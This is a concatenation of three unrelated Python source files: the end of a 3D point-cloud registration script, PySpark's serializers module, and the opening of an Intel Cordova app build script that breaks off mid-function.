descriptor_string = descriptor_string,
basename_in = args.basename_in)
# if args.compute_scale:
# reg3d.register_icp(gt_root_dir = gt_root_dir,
# trial_root_dir = trial_root_dir,
# descriptor_type = descriptor_type,
# radius = radius,
# percentile = percentile,
# nr_iterations = args.n_iter,
# compute_scale = args.compute_scale,
# use_max_nr_iter = True,
# verbose = verbose,
# aux_output_string = aux_output_string + "_sac",
# descriptor_string = descriptor_string,
# basename_in = args.basename_in)
if args.vis_ia:
print "Visualizing IA"
reg3d.visualize_reg_ia(gt_root_dir, trial_root_dir,
descriptor_type, radius,
percentile, args.n_iter, args.geo, aux_output_string, args.basename_in)
# reg3d.visualize_reg_ia(gt_root_dir, trial_root_dir,
# descriptor_type, radius,
# percentile, args.n_iter, args.geo, aux_output_string + "_sac", args.basename_in)
if args.vis_icp:
print "Visualizing ICP"
reg3d.visualize_reg_icp(gt_root_dir, trial_root_dir,
descriptor_type, radius,
percentile, args.n_iter, args.rej_normals, args.geo,
aux_output_string, args.basename_in)
if args.plot_Terror:
print "Saving Terror plots"
import compute_transformation_error as TE
TE.main()
import plot_ICP_iterations
plot_ICP_iterations.main()
import compute_trans_geo_accuracy as TE_GEO
TE_GEO.main()
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
PySpark supports custom serializers for transferring data; this can improve
performance.
By default, PySpark uses :class:`PickleSerializer` to serialize objects using Python's
`cPickle` serializer, which can serialize nearly any Python object.
Other serializers, like :class:`MarshalSerializer`, support fewer datatypes but can be
faster.
The serializer is chosen when creating :class:`SparkContext`:
>>> from pyspark.context import SparkContext
>>> from pyspark.serializers import MarshalSerializer
>>> sc = SparkContext('local', 'test', serializer=MarshalSerializer())
>>> sc.parallelize(list(range(1000))).map(lambda x: 2 * x).take(10)
[0, 2, 4, 6, 8, 10, 12, 14, 16, 18]
>>> sc.stop()
PySpark serializes objects in batches; by default, the batch size is chosen based
on the size of objects and is also configurable by SparkContext's `batchSize`
parameter:
>>> sc = SparkContext('local', 'test', batchSize=2)
>>> rdd = sc.parallelize(range(16), 4).map(lambda x: x)
Behind the scenes, this creates a JavaRDD with four partitions, each of
which contains two batches of two objects:
>>> rdd.glom().collect()
[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11], [12, 13, 14, 15]]
>>> int(rdd._jrdd.count())
8
>>> sc.stop()
"""
import sys
from itertools import chain, product
import marshal
import struct
import types
import collections
import zlib
import itertools
import pickle
pickle_protocol = pickle.HIGHEST_PROTOCOL
from pyspark import cloudpickle
from pyspark.util import print_exec
__all__ = ["PickleSerializer", "MarshalSerializer", "UTF8Deserializer"]
class SpecialLengths(object):
    # Negative sentinel values written where a frame length would normally
    # appear, signalling out-of-band conditions to the reader.
    END_OF_DATA_SECTION = -1  # no more framed records (FramedSerializer raises EOFError)
    PYTHON_EXCEPTION_THROWN = -2  # presumably signals a worker-side exception — see protocol peers
    TIMING_DATA = -3  # presumably followed by timing metrics — see protocol peers
    END_OF_STREAM = -4  # presumably terminates the whole stream — see protocol peers
    NULL = -5  # a single None value with no payload bytes
    START_ARROW_STREAM = -6  # presumably introduces an Arrow stream — see protocol peers
class Serializer(object):
    """
    Base class for all serializers.

    Concrete subclasses implement ``dump_stream``/``load_stream``; the
    equality helpers below let callers check whether two serializers are
    interchangeable.
    """

    def dump_stream(self, iterator, stream):
        """
        Serialize an iterator of objects to the output stream.
        """
        raise NotImplementedError

    def load_stream(self, stream):
        """
        Return an iterator of deserialized objects from the input stream.
        """
        raise NotImplementedError

    def _load_stream_without_unbatching(self, stream):
        """
        Return an iterator of deserialized batches (iterable) of objects from the input stream.

        If the serializer does not operate on batches the default
        implementation wraps every object in a single-element list.
        """
        for obj in self.load_stream(stream):
            yield [obj]

    # Note: our notion of "equality" is that output generated by
    # equal serializers can be deserialized using the same serializer.
    # This default implementation handles the simple cases;
    # subclasses should override __eq__ as appropriate.
    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)

    def __repr__(self):
        return "%s()" % type(self).__name__

    def __hash__(self):
        return hash(str(self))
class FramedSerializer(Serializer):
    """
    Serializer that writes objects as a stream of (length, data) pairs,
    where `length` is a 32-bit integer and data is `length` bytes.
    """

    def dump_stream(self, iterator, stream):
        # One frame per object.
        for item in iterator:
            self._write_with_length(item, stream)

    def load_stream(self, stream):
        # Keep yielding frames until the stream signals end-of-data.
        while True:
            try:
                obj = self._read_with_length(stream)
            except EOFError:
                return
            yield obj

    def _write_with_length(self, obj, stream):
        payload = self.dumps(obj)
        if payload is None:
            raise ValueError("serialized value should not be None")
        if len(payload) > (1 << 31):
            raise ValueError("can not serialize object larger than 2G")
        write_int(len(payload), stream)
        stream.write(payload)

    def _read_with_length(self, stream):
        length = read_int(stream)
        if length == SpecialLengths.END_OF_DATA_SECTION:
            raise EOFError
        if length == SpecialLengths.NULL:
            return None
        payload = stream.read(length)
        if len(payload) < length:
            # Truncated frame: the stream ended mid-record.
            raise EOFError
        return self.loads(payload)

    def dumps(self, obj):
        """
        Serialize an object into a byte array.

        When batching is used, this will be called with an array of objects.
        """
        raise NotImplementedError

    def loads(self, obj):
        """
        Deserialize an object from a byte array.
        """
        raise NotImplementedError
class BatchedSerializer(Serializer):
    """
    Serializes a stream of objects in batches by calling its wrapped
    Serializer with streams of objects.
    """

    UNLIMITED_BATCH_SIZE = -1
    UNKNOWN_BATCH_SIZE = 0

    def __init__(self, serializer, batchSize=UNLIMITED_BATCH_SIZE):
        # serializer: the wrapped per-batch serializer.
        # batchSize: number of objects per batch, or UNLIMITED_BATCH_SIZE
        # to emit everything as one batch.
        self.serializer = serializer
        self.batchSize = batchSize

    def _batched(self, iterator):
        """Yield lists of at most ``batchSize`` items from ``iterator``."""
        if self.batchSize == self.UNLIMITED_BATCH_SIZE:
            yield list(iterator)
        elif isinstance(iterator, list):
            # Fast path: slice sized lists directly instead of accumulating
            # item by item.  (This branch previously tested for
            # "__getslice__", which no type defines on Python 3, so it was
            # dead code there; list slices yield the same batches as the
            # general path below.)
            n = len(iterator)
            for i in range(0, n, self.batchSize):
                yield iterator[i: i + self.batchSize]
        else:
            items = []
            count = 0
            for item in iterator:
                items.append(item)
                count += 1
                if count == self.batchSize:
                    yield items
                    items = []
                    count = 0
            if items:
                # Trailing partial batch.
                yield items

    def dump_stream(self, iterator, stream):
        self.serializer.dump_stream(self._batched(iterator), stream)

    def load_stream(self, stream):
        return chain.from_iterable(self._load_stream_without_unbatching(stream))

    def _load_stream_without_unbatching(self, stream):
        return self.serializer.load_stream(stream)

    def __repr__(self):
        return "BatchedSerializer(%s, %d)" % (str(self.serializer), self.batchSize)
class FlattenedValuesSerializer(BatchedSerializer):
    """
    Serializes a stream of list of pairs, split the list of values
    which contain more than a certain number of objects to make them
    have similar sizes.
    """

    def __init__(self, serializer, batchSize=10):
        BatchedSerializer.__init__(self, serializer, batchSize)

    def _batched(self, iterator):
        limit = self.batchSize
        for key, values in iterator:
            # Re-emit the key once per slice of at most `limit` values.
            start = 0
            total = len(values)
            while start < total:
                yield key, values[start:start + limit]
                start += limit

    def load_stream(self, stream):
        return self.serializer.load_stream(stream)

    def __repr__(self):
        return "FlattenedValuesSerializer(%s, %d)" % (self.serializer, self.batchSize)
class AutoBatchedSerializer(BatchedSerializer):
    """
    Choose the size of batch automatically based on the size of object
    """

    def __init__(self, serializer, bestSize=1 << 16):
        # bestSize: target serialized size (bytes) of one batch.
        BatchedSerializer.__init__(self, serializer, self.UNKNOWN_BATCH_SIZE)
        self.bestSize = bestSize

    def dump_stream(self, iterator, stream):
        # Grow the batch while serialized chunks stay under the target size
        # and shrink it when they blow well past it.
        batch, best = 1, self.bestSize
        iterator = iter(iterator)
        while True:
            vs = list(itertools.islice(iterator, batch))
            if not vs:
                break
            # Renamed from `bytes`, which shadowed the builtin type.
            data = self.serializer.dumps(vs)
            write_int(len(data), stream)
            stream.write(data)
            size = len(data)
            if size < best:
                batch *= 2
            elif size > best * 10 and batch > 1:
                batch //= 2

    def __repr__(self):
        return "AutoBatchedSerializer(%s)" % self.serializer
class CartesianDeserializer(Serializer):
    """
    Deserializes the JavaRDD cartesian() of two PythonRDDs.

    Due to pyspark batching we cannot simply use the result of the Java RDD
    cartesian, we additionally need to do the cartesian within each pair of
    batches.
    """

    def __init__(self, key_ser, val_ser):
        self.key_ser = key_ser
        self.val_ser = val_ser

    def _load_stream_without_unbatching(self, stream):
        key_batches = self.key_ser._load_stream_without_unbatching(stream)
        val_batches = self.val_ser._load_stream_without_unbatching(stream)
        for key_batch, val_batch in zip(key_batches, val_batches):
            # for correctness with repeated cartesian/zip this must be
            # returned as one batch
            yield product(key_batch, val_batch)

    def load_stream(self, stream):
        return chain.from_iterable(self._load_stream_without_unbatching(stream))

    def __repr__(self):
        return "CartesianDeserializer(%s, %s)" % (str(self.key_ser), str(self.val_ser))
class PairDeserializer(Serializer):
    """
    Deserializes the JavaRDD zip() of two PythonRDDs.
    Due to pyspark batching we cannot simply use the result of the Java RDD zip,
    we additionally need to do the zip within each pair of batches.
    """
    def __init__(self, key_ser, val_ser):
        # Serializers for the left (key) and right (value) side streams.
        self.key_ser = key_ser
        self.val_ser = val_ser
    def _load_stream_without_unbatching(self, stream):
        key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
        val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
        for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
            # For double-zipped RDDs, the batches can be iterators from other PairDeserializer,
            # instead of lists. We need to convert them to lists if needed.
            key_batch = key_batch if hasattr(key_batch, '__len__') else list(key_batch)
            val_batch = val_batch if hasattr(val_batch, '__len__') else list(val_batch)
            # Zipped batches must pair up one-to-one, or the zip is invalid.
            if len(key_batch) != len(val_batch):
                raise ValueError("Can not deserialize PairRDD with different number of items"
                                 " in batches: (%d, %d)" % (len(key_batch), len(val_batch)))
            # for correctness with repeated cartesian/zip this must be returned as one batch
            yield zip(key_batch, val_batch)
    def load_stream(self, stream):
        # Flatten the per-batch pairs into a single item stream.
        return chain.from_iterable(self._load_stream_without_unbatching(stream))
    def __repr__(self):
        return "PairDeserializer(%s, %s)" % (str(self.key_ser), str(self.val_ser))
class NoOpSerializer(FramedSerializer):
    """Pass-through framed serializer: each frame IS the value, unmodified."""

    def loads(self, obj):
        # Identity: the raw frame already is the deserialized value.
        return obj

    def dumps(self, obj):
        # Identity: the value already is its serialized byte form.
        return obj
# Hack namedtuple, make it picklable
# Cache of reconstructed namedtuple classes keyed by (name, fields), so
# repeated unpickling reuses a single class object per tuple shape.
__cls = {}
def _restore(name, fields, value):
    """Rebuild a namedtuple instance from its pickled (name, fields, values)."""
    key = (name, fields)
    try:
        cls = __cls[key]
    except KeyError:
        # First time this shape is seen: create the class and cache it.
        cls = __cls[key] = collections.namedtuple(name, fields)
    return cls(*value)
def _hack_namedtuple(cls):
    """ Make class generated by namedtuple picklable """
    name = cls.__name__
    fields = cls._fields
    # The closure captures only plain data (name, fields); pickling then
    # stores the _restore callable plus the tuple contents, not the class.
    def __reduce__(self):
        return (_restore, (name, fields, tuple(self)))
    cls.__reduce__ = __reduce__
    # Marker so other code can recognise patched namedtuple classes.
    cls._is_namedtuple_ = True
    return cls
def _hijack_namedtuple():
    """ Hack namedtuple() to make it picklable """
    # hijack only one time
    if hasattr(collections.namedtuple, "__hijack"):
        return
    global _old_namedtuple  # or it will put in closure
    global _old_namedtuple_kwdefaults  # or it will put in closure too
    def _copy_func(f):
        # Snapshot the original function object so the replacement below can
        # still call the unpatched implementation.
        return types.FunctionType(f.__code__, f.__globals__, f.__name__,
                                  f.__defaults__, f.__closure__)
    _old_namedtuple = _copy_func(collections.namedtuple)
    _old_namedtuple_kwdefaults = collections.namedtuple.__kwdefaults__
    def namedtuple(*args, **kwargs):
        # Re-apply the original keyword defaults explicitly, since swapping
        # __code__ below does not carry them over.
        for k, v in _old_namedtuple_kwdefaults.items():
            kwargs[k] = kwargs.get(k, v)
        cls = _old_namedtuple(*args, **kwargs)
        return _hack_namedtuple(cls)
    # replace namedtuple with the new one
    collections.namedtuple.__globals__["_old_namedtuple_kwdefaults"] = _old_namedtuple_kwdefaults
    collections.namedtuple.__globals__["_old_namedtuple"] = _old_namedtuple
    collections.namedtuple.__globals__["_hack_namedtuple"] = _hack_namedtuple
    collections.namedtuple.__code__ = namedtuple.__code__
    collections.namedtuple.__hijack = 1
    # hack the cls already generated by namedtuple.
    # Those created in other modules can be pickled as normal,
    # so only hack those in __main__ module
    for n, o in sys.modules["__main__"].__dict__.items():
        if (type(o) is type and o.__base__ is tuple
                and hasattr(o, "_fields")
                and "__reduce__" not in o.__dict__):
            _hack_namedtuple(o)  # hack inplace
_hijack_namedtuple()  # patch namedtuple at import time, before user code runs
class PickleSerializer(FramedSerializer):
    """
    Serializes objects using Python's pickle serializer:
    http://docs.python.org/2/library/pickle.html
    This serializer supports nearly any Python object, but may
    not be as fast as more specialized serializers.
    """
    def dumps(self, obj):
        # pickle_protocol is a module-level constant defined elsewhere in
        # this file.
        return pickle.dumps(obj, pickle_protocol)
    def loads(self, obj, encoding="bytes"):
        # encoding="bytes" lets Python 3 read str data pickled by Python 2.
        return pickle.loads(obj, encoding=encoding)
class CloudPickleSerializer(PickleSerializer):
    """Pickle serializer backed by cloudpickle, so functions, lambdas and
    closures can be serialized as well."""
    def dumps(self, obj):
        try:
            return cloudpickle.dumps(obj, pickle_protocol)
        except pickle.PickleError:
            # Already a pickling error with a useful message; re-raise as-is.
            raise
        except Exception as e:
            emsg = str(e)
            # struct's "'i' format requires ..." message indicates the
            # object exceeded the frame size limit.
            if "'i' format requires" in emsg:
                msg = "Object too large to serialize: %s" % emsg
            else:
                msg = "Could not serialize object: %s: %s" % (e.__class__.__name__, emsg)
            print_exec(sys.stderr)
            raise pickle.PicklingError(msg)
class MarshalSerializer(FramedSerializer):
    """
    Serializes objects using Python's Marshal serializer:
    http://docs.python.org/2/library/marshal.html

    Faster than PickleSerializer, but only supports the built-in types
    that marshal can handle.
    """

    def dumps(self, obj):
        return marshal.dumps(obj)

    def loads(self, obj):
        return marshal.loads(obj)
class AutoSerializer(FramedSerializer):
    """
    Chooses marshal or pickle as the serialization protocol automatically.

    Each frame is tagged with a one-byte prefix: b'M' for marshal data,
    b'P' for pickle data.  Once marshal fails for any value, pickle is
    used for every subsequent frame.
    """
    def __init__(self):
        FramedSerializer.__init__(self)
        # None until marshal first fails; then b'P' to force pickle.
        self._type = None
    def dumps(self, obj):
        if self._type is not None:
            return b'P' + pickle.dumps(obj, -1)
        try:
            return b'M' + marshal.dumps(obj)
        except Exception:
            self._type = b'P'
            return b'P' + pickle.dumps(obj, -1)
    def loads(self, obj):
        # Slice (obj[0:1]) rather than index (obj[0]): indexing a bytes
        # object yields an int on Python 3, which would never compare
        # equal to the b'M'/b'P' tags.  Slicing yields bytes on both 2 and 3.
        _type = obj[0:1]
        if _type == b'M':
            return marshal.loads(obj[1:])
        elif _type == b'P':
            return pickle.loads(obj[1:])
        else:
            raise ValueError("invalid serialization type: %s" % _type)
class CompressedSerializer(FramedSerializer):
    """
    Wraps another FramedSerializer and zlib-compresses every frame.
    """

    def __init__(self, serializer):
        FramedSerializer.__init__(self)
        assert isinstance(serializer, FramedSerializer), "serializer must be a FramedSerializer"
        self.serializer = serializer

    def dumps(self, obj):
        raw = self.serializer.dumps(obj)
        # Compression level 1: cheapest, favouring speed over ratio.
        return zlib.compress(raw, 1)

    def loads(self, obj):
        raw = zlib.decompress(obj)
        return self.serializer.loads(raw)

    def __repr__(self):
        return "CompressedSerializer(%s)" % self.serializer
class UTF8Deserializer(Serializer):
    """
    Deserializes streams written by String.getBytes.

    Each record is a 4-byte big-endian length followed by that many bytes
    of UTF-8 data; special negative lengths mark end-of-data and nulls.
    """
    def __init__(self, use_unicode=True):
        # When False, the raw bytes are returned instead of decoded text.
        self.use_unicode = use_unicode
    def loads(self, stream):
        length = read_int(stream)
        if length == SpecialLengths.END_OF_DATA_SECTION:
            raise EOFError
        elif length == SpecialLengths.NULL:
            return None
        s = stream.read(length)
        return s.decode("utf-8") if self.use_unicode else s
    def load_stream(self, stream):
        try:
            while True:
                yield self.loads(stream)
        except struct.error:
            # Truncated length prefix: treat as a normal end of stream.
            return
        except EOFError:
            return
    def __repr__(self):
        return "UTF8Deserializer(%s)" % self.use_unicode
def read_long(stream):
    """Read a big-endian signed 64-bit integer; raise EOFError at end of stream."""
    data = stream.read(8)
    if not data:
        raise EOFError
    (value,) = struct.unpack("!q", data)
    return value
def write_long(value, stream):
    """Write *value* to *stream* as a big-endian signed 64-bit integer."""
    packed = struct.pack("!q", value)
    stream.write(packed)
def pack_long(value):
    """Return *value* packed as 8 big-endian signed bytes."""
    return struct.pack("!q", value)
def read_int(stream):
    """Read a big-endian signed 32-bit integer; raise EOFError at end of stream."""
    data = stream.read(4)
    if not data:
        raise EOFError
    (value,) = struct.unpack("!i", data)
    return value
def write_int(value, stream):
    """Write *value* to *stream* as a big-endian signed 32-bit integer."""
    packed = struct.pack("!i", value)
    stream.write(packed)
def read_bool(stream):
    """Read one byte as a boolean; raise EOFError at end of stream."""
    data = stream.read(1)
    if not data:
        raise EOFError
    (value,) = struct.unpack("!?", data)
    return value
def write_with_length(obj, stream):
    """Write *obj* (bytes) to *stream*, prefixed with its 32-bit length."""
    write_int(len(obj), stream)
    stream.write(obj)
class ChunkedStream(object):
    """
    This is a file-like object takes a stream of data, of unknown length, and breaks it into fixed
    length frames. The intended use case is serializing large data and sending it immediately over
    a socket -- we do not want to buffer the entire data before sending it, but the receiving end
    needs to know whether or not there is more data coming.
    It works by buffering the incoming data in some fixed-size chunks. If the buffer is full, it
    first sends the buffer size, then the data. This repeats as long as there is more data to send.
    When this is closed, it sends the length of whatever data is in the buffer, then that data, and
    finally a "length" of -1 to indicate the stream has completed.
    """
    def __init__(self, wrapped, buffer_size):
        # wrapped: underlying writable stream; buffer_size: frame payload size.
        self.buffer_size = buffer_size
        self.buffer = bytearray(buffer_size)
        # Number of buffered bytes not yet flushed to `wrapped`.
        self.current_pos = 0
        self.wrapped = wrapped
    def write(self, bytes):
        # byte_pos tracks how much of the input has been consumed so far.
        byte_pos = 0
        byte_remaining = len(bytes)
        while byte_remaining > 0:
            new_pos = byte_remaining + self.current_pos
            if new_pos < self.buffer_size:
                # just put it in our buffer
                self.buffer[self.current_pos:new_pos] = bytes[byte_pos:]
                self.current_pos = new_pos
                byte_remaining = 0
            else:
                # fill the buffer, send the length then the contents, and start filling again
                space_left = self.buffer_size - self.current_pos
                new_byte_pos = byte_pos + space_left
                self.buffer[self.current_pos:self.buffer_size] = bytes[byte_pos:new_byte_pos]
                write_int(self.buffer_size, self.wrapped)
                self.wrapped.write(self.buffer)
                byte_remaining -= space_left
                byte_pos = new_byte_pos
                self.current_pos = 0
    def close(self):
        # if there is anything left in the buffer, write it out first
        if self.current_pos > 0:
            write_int(self.current_pos, self.wrapped)
            self.wrapped.write(self.buffer[:self.current_pos])
        # -1 length indicates to the receiving end that we're done.
        write_int(-1, self.wrapped)
        self.wrapped.close()
    @property
    def closed(self):
        """
        Return True if the `wrapped` object has been closed.
        NOTE: this property is required by pyarrow to be used as a file-like object in
        pyarrow.RecordBatchStreamWriter from ArrowStreamSerializer
        """
        return self.wrapped.closed
if __name__ == '__main__':
    # Run this module's doctests; exit non-zero if any of them fail.
    import doctest
    (failure_count, test_count) = doctest.testmod()
    if failure_count:
        sys.exit(-1)
|
|
#!/usr/bin/env python
#
# Copyright (c) 2015 Intel Corporation.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of works must retain the original copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the original copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this work without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors:
# Fan, Yugang <yugang.fan@intel.com>
# Lin, Wanming <wanming.lin@intel.com>
import os
import shutil
import glob
import time
import sys
import stat
import random
import json
import logging
import signal
import commands
import fnmatch
import subprocess
import re
import pexpect
from optparse import OptionParser
# Python 2 only: re-expose sys.setdefaultencoding (removed by site.py) and
# force UTF-8 so implicit str/unicode conversions do not raise.
reload(sys)
sys.setdefaultencoding('utf8')
TOOL_VERSION = "v0.1"
VERSION_FILE = "VERSION"
# Default timeout (seconds) for each shell command run through doCMD().
DEFAULT_CMD_TIMEOUT = 600
# Accepted values for the -n, --cordova-version, -m and -a options.
PKG_NAMES = ["gallery", "helloworld", "remotedebugging", "mobilespec"]
CORDOVA_VERSIONS = ["3.6", "4.0"]
PKG_MODES = ["shared", "embedded"]
PKG_ARCHS = ["x86", "arm"]
# Populated later: BUILD_PARAMETERS/LOG in main(), BUILD_ROOT in prepareBuildRoot().
BUILD_PARAMETERS = None
BUILD_ROOT = None
LOG = None
LOG_LEVEL = logging.DEBUG
BUILD_TIME = time.strftime('%Y%m%d', time.localtime(time.time()))
class ColorFormatter(logging.Formatter):
    """Log formatter that adds ANSI styling based on message prefix and level.

    A leading ``+`` renders the rest of the message in bold; a leading ``=``
    renders the whole message in reverse video.  The record level then
    selects the foreground color (INFO green, DEBUG blue, WARNING yellow,
    ERROR red); records at other levels are left uncolored and unmodified.
    """

    def __init__(self, msg):
        logging.Formatter.__init__(self, msg)

    def format(self, record):
        red, green, yellow, blue = range(4)
        colors = {'INFO': green, 'DEBUG': blue,
                  'WARNING': yellow, 'ERROR': red}
        msg = record.msg
        # Guard against empty messages: the unguarded msg[0] check raised
        # IndexError whenever an empty string was logged.
        if msg:
            if msg[0] == "+":
                msg = "\33[01m" + msg[1:] + "\033[0m"
            elif msg[0] == "=":
                msg = "\33[07m" + msg + "\033[0m"
        levelname = record.levelname
        if levelname in colors:
            msg_color = "\033[0;%dm" % (
                31 + colors[levelname]) + msg + "\033[0m"
            record.msg = msg_color
        return logging.Formatter.format(self, record)
def replaceUserString(path, fnexp, old_s, new_s):
    """Replace every occurrence of *old_s* with *new_s* in all files under
    *path* whose names match the glob pattern *fnexp*.

    Files that cannot be read or written are logged and skipped; files
    that do not contain *old_s* are left untouched.
    """
    for sub_file in iterfindfiles(path, fnexp):
        try:
            with open(sub_file, 'r') as sub_read_obj:
                read_string = sub_read_obj.read()
        except IOError as err:
            LOG.error("Read %s Error : " % sub_file + str(err))
            continue
        if read_string.find(old_s) >= 0:
            try:
                with open(sub_file, 'w') as sub_write_obj:
                    # Plain literal replacement: the previous version tested
                    # for the literal substring but substituted via
                    # re.sub(old_s, ...), which misbehaves whenever old_s
                    # contains regex metacharacters.  All call sites pass
                    # literal strings.
                    sub_write_obj.write(read_string.replace(old_s, new_s))
            except IOError as err:
                LOG.error("Modify %s Error : " % sub_file + str(err))
                continue
def iterfindfiles(path, fnexp):
    """Yield the path of every file under *path* whose name matches the
    glob pattern *fnexp*."""
    for dirpath, _dirnames, filenames in os.walk(path):
        for fname in filenames:
            if fnmatch.fnmatch(fname, fnexp):
                yield os.path.join(dirpath, fname)
def isWindows():
    """Return True when running on a Windows-like platform (including cygwin)."""
    platform = sys.platform
    return platform.startswith("win") or platform == "cygwin"
def killProcesses(ppid=None):
    """Kill process *ppid* and all of its descendants.

    On Windows, delegates to ``TASKKILL /F /T``.  Elsewhere, the process
    table is walked (via ``ps -ef``) to collect the whole descendant tree,
    then every pid is SIGKILLed; pids are popped from the end of the list,
    so descendants die before their ancestors.

    Returns True when every kill succeeded.  The previous implementation
    returned immediately after the FIRST successful kill, leaving the rest
    of the process tree running.
    """
    if isWindows():
        subprocess.check_call("TASKKILL /F /PID %s /T" % ppid)
        return True
    ppid = str(ppid)

    def get_child_pids(parent):
        # Pids whose parent pid (3rd column of `ps -ef`) equals *parent*.
        command = "ps -ef | awk '{if ($3 ==%s) print $2;}'" % str(parent)
        return os.popen(command).read().split()

    # Breadth-first collection: extending the list while iterating it pulls
    # in grandchildren as their parents are discovered.
    pidgrp = []
    pidgrp.extend(get_child_pids(ppid))
    for pid in pidgrp:
        pidgrp.extend(get_child_pids(pid))
    pidgrp.insert(0, ppid)
    success = True
    while len(pidgrp) > 0:
        pid = pidgrp.pop()
        try:
            os.kill(int(pid), signal.SIGKILL)
        except OSError:
            try:
                os.popen("kill -9 %d" % int(pid))
            except Exception:
                success = False
    return success
def checkContains(origin_str=None, key_str=None):
    """Case-insensitively check whether *key_str* occurs in *origin_str*."""
    return key_str.upper() in origin_str.upper()
def getRandomStr():
    """Return a random 15-character string of lowercase letters and digits."""
    str_pool = "abcdefghijklmnopqrstuvwxyz1234567890"
    return "".join(random.choice(str_pool) for _ in range(15))
def overwriteCopy(src, dest, symlinks=False, ignore=None):
    """Recursively copy *src* into *dest*, overwriting existing entries.

    Like shutil.copytree, but tolerates an already-existing destination
    tree.  When *symlinks* is True, symbolic links are recreated rather
    than followed; *ignore* has copytree's ignore-callable semantics.
    """
    if not os.path.exists(dest):
        os.makedirs(dest)
        shutil.copystat(src, dest)
    sub_list = os.listdir(src)
    if ignore:
        excl = ignore(src, sub_list)
        sub_list = [x for x in sub_list if x not in excl]
    for i_sub in sub_list:
        s_path = os.path.join(src, i_sub)
        d_path = os.path.join(dest, i_sub)
        if symlinks and os.path.islink(s_path):
            # Replace any existing entry, then recreate the link itself.
            if os.path.lexists(d_path):
                os.remove(d_path)
            os.symlink(os.readlink(s_path), d_path)
            try:
                # os.lchmod only exists on some platforms (e.g. BSD/macOS);
                # failures are deliberately ignored.
                s_path_s = os.lstat(s_path)
                s_path_mode = stat.S_IMODE(s_path_s.st_mode)
                os.lchmod(d_path, s_path_mode)
            except Exception:
                pass
        elif os.path.isdir(s_path):
            overwriteCopy(s_path, d_path, symlinks, ignore)
        else:
            shutil.copy2(s_path, d_path)
def doCopy(src_item=None, dest_item=None):
    """Copy a file or a whole directory tree, creating parent dirs as needed.

    Returns True on success, False (with the error logged) on failure.
    """
    LOG.info("Copying %s to %s" % (src_item, dest_item))
    try:
        if os.path.isdir(src_item):
            overwriteCopy(src_item, dest_item, symlinks=True)
        else:
            if not os.path.exists(os.path.dirname(dest_item)):
                LOG.info("Create non-existent dir: %s" %
                         os.path.dirname(dest_item))
                os.makedirs(os.path.dirname(dest_item))
            shutil.copy2(src_item, dest_item)
    except Exception as e:
        LOG.error("Fail to copy file %s: %s" % (src_item, e))
        return False
    return True
def doRemove(target_file_list=None):
    """Delete every path in *target_file_list* (directories recursively).

    Returns False on the first failure, True when all removals succeed.
    """
    for target in target_file_list:
        LOG.info("Removing %s" % target)
        try:
            remover = shutil.rmtree if os.path.isdir(target) else os.remove
            remover(target)
        except Exception as e:
            LOG.error("Fail to remove file %s: %s" % (target, e))
            return False
    return True
def exitHandler(return_code=1):
    """Remove the temporary build root (unless --notclean was given), log
    the final status, and exit the process with *return_code*."""
    LOG.info("+Cleaning build root folder ...")
    if not BUILD_PARAMETERS.bnotclean and os.path.exists(BUILD_ROOT):
        if not doRemove([BUILD_ROOT]):
            LOG.error("Fail to clean build root, exit ...")
            sys.exit(1)
    if return_code == 0:
        LOG.info("================ DONE ================")
    else:
        LOG.error(
            "================ Found Something Wrong !!! ================")
    sys.exit(return_code)
def prepareBuildRoot():
    """Pick a fresh, randomly-named directory under /tmp as BUILD_ROOT and
    remove any stale <PKG_NAME>*.apk from the current directory.

    NOTE(review): relies on the PKG_NAME global being assigned in main()
    before this is called.
    """
    LOG.info("+Preparing build root folder ...")
    global BUILD_ROOT
    # Loop until a path that does not yet exist is found.
    while True:
        BUILD_ROOT = os.path.join("/tmp", getRandomStr())
        if os.path.exists(BUILD_ROOT):
            continue
        else:
            break
    if not doRemove(
            glob.glob(os.path.join("%s*.apk" % PKG_NAME))):
        return False
    return True
def doCMD(cmd, time_out=DEFAULT_CMD_TIMEOUT, no_check_return=False):
    """Run *cmd* in a shell, polling its status every 2 seconds.

    If *time_out* seconds elapse before the command exits, its whole
    process tree is killed and False is returned.  Unless
    *no_check_return* is set, a non-zero exit status also returns False.
    Returns True otherwise.
    """
    LOG.info("Doing CMD: [ %s ]" % cmd)
    pre_time = time.time()
    cmd_proc = subprocess.Popen(args=cmd, shell=True)
